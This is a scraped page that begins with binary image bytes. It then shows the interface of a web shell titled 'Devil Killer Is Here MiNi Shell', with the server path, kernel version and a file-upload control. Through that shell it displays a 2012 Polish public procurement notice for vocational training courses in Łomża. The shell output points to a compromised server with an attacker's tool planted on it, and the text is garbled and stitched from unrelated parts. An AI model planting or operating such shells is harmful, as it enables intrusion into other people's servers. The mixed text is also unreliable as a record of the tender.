JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120706/239700-N-2012.html

<p class="kh_header"><b>Łomża: Zorganizowanie i przeprowadzenie  kursów dla uczestników projektu pn. Razem ku samodzielności-Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym w ramach Poddziałania 7.1.2 Działanie 7.1 Priorytet VII Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 239700 - 2012; data zamieszczenia: 06.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Łomży , ul. Szosa Zambrowska 1/27, 18-400 Łomża, woj. podlaskie, tel. (086) 215 69 42, faks (086) 215 69 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiatlomzynski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie  kursów dla uczestników projektu pn. Razem ku samodzielności-Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym w ramach Poddziałania 7.1.2 Działanie 7.1 Priorytet VII Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest usługa polegająca na zorganizowaniu i przeprowadzeniu  dla  uczestników projektu pn. Razem ku samodzielności-Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym w ramach Poddziałania 7.1.2 Działanie 7.1 Priorytet VII Programu Operacyjnego Kapitał Ludzki,-  w wymiarze godzin zgodnym z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U.2005, nr 217, poz. 1834 z późn. zm.) - kursów zawodowych  wyszczególnionych poniższej:
CZĘŚĆ ZAMÓWIENIA: I (termin realizacji lipiec - 31 października 2012)
1.	Kurs operatora koparko -ładowarki kl. III - 19 osób.
2.	Kurs operatora ładowarki jednonaczyniowej kl. III - 1 osoby.
3.	Kurs operatora koparki kl. III - 2 osoby.
CZĘŚĆ ZAMÓWIENIA: II (termin realizacji 3 wrzesień - 30 listopada 2012)
4.	Kurs spawania metodą  MAG - 10 osób.
5.	Kurs spawania metodą   TIG - 10 osób.
6.	Kurs spawania metodą  MMA (elektroda otulona) - 1 osoba.
7.	Kurs spawania blach spoinami czołowymi (metoda MAG i TIG) - 1 osoba.
CZĘŚĆ ZAMÓWIENIA: III (termin realizacji lipiec - 31 października 2012)
8.	Kurs  gastronomiczny z obsługą kasy fiskalnej - 13 osób.
9.	Kelner - barman - 2 osoby.
CZĘŚĆ ZAMÓWIENIA: IV (termin realizacji lipiec - sierpień)
10.	Obsługa kasy fiskalnej+ terminali kart płatniczych - 25 osoby (23 lipiec - 3 sierpnia 2012).
11.	Sprzedawca+ fakturowanie - 15 osób (lipiec - sierpień) .
CZĘŚĆ ZAMÓWIENIA: V (termin realizacji lipiec - 31 październik 2012)
12.	Kadry i płace z elementami księgowości - 11 osób.
CZĘŚĆ ZAMÓWIENIA: VI (termin realizacji lipiec - wrzesień 2012)
13.	Kurs kosmetyczny z elementami wizażu i stylizacji paznokci - 12 osób.
CZĘŚĆ ZAMÓWIENIA: VII (termin realizacji 23 lipiec - 31 sierpnia 2012)
14.	Kurs fryzjerski - 9 osób.
CZĘŚĆ ZAMÓWIENIA: VIII (termin realizacji październik 2012)
15.	Florystyka-bukieciarstwo - 7 osób.
CZĘŚĆ ZAMÓWIENIA: IX (termin realizacji sierpień 2012)
16.	Kurs opiekuna osób zależnych (opiekun osób starszych/chorych/niepełnosprawnych, opiekunka dziecięca, opiekun środowiskowy) - 6 osób.
CZĘŚĆ ZAMÓWIENIA: X (termin realizacji lipiec - listopad 2012)
17.	Podstawy obsługi komputera z pakietem MS Office - 9 osób (wrzesień - listopad 2012).
18.	Obsługa komputera-poziom średniozaawansowany - 4 osoby (lipiec - wrzesień 2012).
19.	Grafika komputerowa - 5 osób (23 lipca - 14 sierpnia 2012).
20.	Programowanie AUTOCAD, AUTOCAD 2 - 1 osoba (lipiec - sierpień 2012).
CZĘŚĆ ZAMÓWIENIA: XI (termin realizacji - sierpień 2012)
21.	Instruktor jazdy konnej - 1 osoba.
CZĘŚĆ ZAMÓWIENIA: XII (termin realizacji sierpień - 31 października 2012)
22.	Elektronika samochodowa - 1 osoba.
CZĘŚĆ ZAMÓWIENIA: XIII (termin realizacji sierpień - październik 2012)
23.	Kurs pielęgniarki środowiskowej - 1 osoba.
Podane ilości osób biorących udział w kursach są ilościami szacunkowymi. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia liczby osób skierowanych na szkolenie w przypadku, gdy wystąpi okoliczność, że zbędnym, niemożliwym lub koniecznym stanie się przeprowadzenie szkolenia dla mniejszej lub większej liczby osób niż wskazano.

Miejsce i termin realizacji zamówienia - poszczególnych kursów zostały sprecyzowane i znajdują się w załączniku nr 7 - szczegółowy opis przedmiotu zamówienia. 

Z uwagi na fakt, iż część uczestników projektu uczestniczy w różnych formach wsparcia, a często realizują więcej niż 1 kurs  Wykonawca składający ofertę musi uwzględnić podany w załączniku nr 7 sposób organizacji szkolenia.

Z uwagi na wysoki udział osób niepełnosprawnych w projekcie, wymaga się aby kursy, które mają być realizowane w mieście Łomża odbywały się w miejscu o dogodnej lokalizacji (blisko dworca PKS tj. nie dalej niż 500 m, jeżeli Wykonawca nie znajdzie takiego miejsca, nie dalej niż 300 m od przystanku MPK linii 8 lub 10) lub aby wykonawca zapewnił bezpłatny transport uczestników z dworca PKS do miejsca szkolenia i z powrotem . W związku z uczestnictwem w projekcie kilku osób niepełnosprawnych ruchowo wymaga się, aby kurs nr 10 - Obsługa kasy fiskalnej+ terminali kart płatniczych oraz kurs nr 19 - Grafika komputerowa odbywały się w miejscu bez barier architektonicznych dla osób poruszających się na wózku inwalidzkim.
Wymagania stawiane wykonawcom:
1.	Wykonawca powinien posiadać zgodę na realizację szkoleń w  danym zakresie, a program i czas trwania  szkolenia  musi być zgodny z  obowiązującymi w tym zakresie przepisami prawa wytycznymi.
2.	Wykonawca ma obowiązek zapewnienia sal dydaktycznych, specjalistycznych pracowni wyposażonych w niezbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie oraz przygotowanie do egzaminu.
3.	W przypadku konieczności wynikającej z przepisów BHP Wykonawca jest zobowiązany do zapewnienia uczestnikom kursu osprzętu i odzieży ochronnej.
4.	Wykonawca jest zobowiązany do sfinansowania kosztów przeprowadzenia niezbędnych badań lekarskich (przeprowadzonych przez lekarza medycyny pracy mających na celu stwierdzenie zdolności do odbycia kursu oraz podjęcia zatrudnienia zgodnego z kierunkiem szkolenia) czy kosztów wyrobienia książeczki zdrowia (dotyczy I oraz II części zamówienia) . Koszt należy uwzględnić w ogólnej cenie kursu. 
5.	Wykonawca ma obowiązek zapewnić wszystkie materiały dydaktyczne niezbędne do realizacji szkolenia. Materiały te należy uwzględnić w kalkulacji kosztów szkolenia. Ponadto każdy uczestnik szkolenia musi otrzymać na własność: program szkolenia i harmonogram zajęć.
6.	Uczestnicy podczas szkolenia będą mieli bezpieczne i higieniczne warunki nauki, swobodny dostęp do pomieszczeń sanitarnych i niezbędnych środków czystości. 
7.	Uczestnikom szkolenia każdego dnia należy zapewnić catering, w skład którego ma wejść: kawa, herbata, woda mineralna, ciastka kruche lub sztukowe (różnego rodzaju), kanapki. 
8.	Wykonawca ma obowiązek ubezpieczyć uczestników szkoleń od następstw nieszczęśliwych wypadków i dostarczyć kserokopię zawartej polisy ubezpieczeniowej do Zamawiającego. Koszt ubezpieczenia NNW należy ująć w cenie.
9.	Wszystkie dokumenty dotyczące realizacji przedmiotowych działań będą zawierały informację o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
10.	Budynek i sale szkoleniowe muszą być oznakowane informacją o nazwie szkolenia, czasie trwania kursu, numerze sali, w której odbywają się zajęcia ( musza też zawierać logotypy POKL, EFS oraz informacje o realizowanym projekcie).
11.	Każdy kurs niekończący się egzaminem państwowym musi kończyć się egzaminem przed komisją powołaną przez organizatora szkolenia i wydaniem zaświadczenia potwierdzającego posiadanie kwalifikacji zawodowych zgodne z załącznikiem nr 2 do rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216).
12.	Po zakończeniu każdego kursu uczestnik otrzyma 2 zaświadczenia:
a.	zaświadczenie, które w treści musi zawierać w szczególności: dane osobowe uczestnika - absolwenta kursu (z datą i miejscem urodzenia), nazwę organizatora kursu, termin realizacji kursu, cel kursu, miejscowość i datę wydania zaświadczenia, podpis i pieczęć Wykonawcy uprawnionego do wydania zaświadczenia, nazwę zajęć edukacyjnych i wymiar godzin zajęć praktycznych oraz teoretycznych w zakresie poszczególnych modułów kursu. 
b.	zaświadczenie zawierające dane wymienione w pkt. a wraz z umieszczonymi oznaczeniami Unii Europejskiej Europejski Fundusz Społeczny i Programu Operacyjnego Kapitał Ludzki oraz adnotacja: Projekt ,Razem ku samodzielności-Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego 

13.	Wykonawca sporządzi protokół z egzaminu kończącego kurs
14.	Wykonawca zobowiązuje się do archiwizacji dokumentów dotyczących przebiegu działań edukacyjnych, motywacyjnych i doradczych do 31.12.2020 r.
15.	Ponadto wyłoniony wykonawca będzie zobowiązany do: 
a.	Tydzień po rozpoczęciu kursu Jednostka Szkoleniowa zobowiązana jest dostarczyć do Powiatowego Centrum Pomocy w Rodzinie w Łomży potwierdzone (za zgodność z oryginałem) kopie zaświadczeń o przeprowadzeniu badań lekarskich w przypadku kursów, w których warunkiem uczestnictwa jest pozytywny wynik badań. 
b.	Po zakończeniu kursu Jednostka Szkoleniowa zobowiązana jest dostarczyć do Powiatowego Centrum Pomocy w Rodzinie w Łomży potwierdzone (za zgodność z oryginałem): 
1)kserokopię dziennika zajęć edukacyjnych zawierającego tematy zajęć edukacyjnych i wymiar godzin oraz listę obecności z własnoręcznymi podpisami uczestników kursu (mogą stanowić one załącznik do dziennika zajęć),
2)potwierdzenie odbioru materiałów szkoleniowych
3)kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu i uzyskanie kwalifikacji, 
4)kserokopię rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu i uzyskanie kwalifikacji,
5)imienny wykaz osób, które nie ukończyły kursu, 
6)kserokopię protokołu egzaminacyjnego 
7)ankiety ewaluacyjne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie co najmniej , wymagania stawiane dla Wykonawców ubiegających się o realizację części I- X, trzy usługi szkoleniowe dla minimum 5 osób każda z zakresu wskazanego w przedmiocie zamówienia, zaś dla części XI, XII i XIII - przeszkolenie co najmniej 1 osoby w wymaganym zakresie-  zgodnie z załącznikiem nr 4 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat posiadanych kwalifikacji, uprawnień, doświadczenia i wykształcenia w zakresie niezbędnym do wykonania zamówienia, oraz informację o podstawie dysponowania tymi osobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Program szkolenia. Harmonogram wykonania zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmniejszenia się liczby osób objętych szkoleniem, wysokość wynagrodzenia zostanie obniżona,  proporcjonalnie do zmniejszenia się zakresu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiatlomzynski.pl, www.powiatlomzynski.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Łomży, ul. Szosa Zambrowska 1/27, 18-400 Łomża...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2012 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Łomży, ul. Szosa Zambrowska 1/27, 18-400 Łomża..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki Poddziałania ,Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie Działanie 7.1 Priorytet VII. - Projekt Razem ku samodzielności- Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie kursu składającego się z 3 modułów Operator koparko -ładowarki kl.III, Operator ładowarki jednonaczyniowej do 2,5 m3 , klasa III, Operator jednonaczyniowej koparki 0,8m3 kl.III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Operator koparko -ładowarki kl.III
LICZBA UCZESTNIKÓW: 19
TERMIN  REALIZACJI USŁUGI : lipiec-  31 październik  2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża, ewentualnie miejscowość oddalona najdalej 15 km od Łomży,
W przypadku szkolenia poza Łomżą Wykonawca ma obowiązek zapewnić dojazd z miasta do miejsca szkolenia oraz z miejsca szkolenia do miasta Łomża,
CEL SZKOLENIA: jest przygotowanie uczestników do uzyskania kwalifikacji w zawodzie operatora koparko-ładowarki w zakresie III klasy uprawnień.
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w systemie weekendowym (tj. w soboty i niedziele), w godz. od 8:00 do 16:00. Zajęcia teoretyczne mogą odbywać się w jednej grupie, natomiast zajęcia praktyczne muszą być realizowane z podziałem na dwie grupy.

WYMAGANIA DODATKOWE:

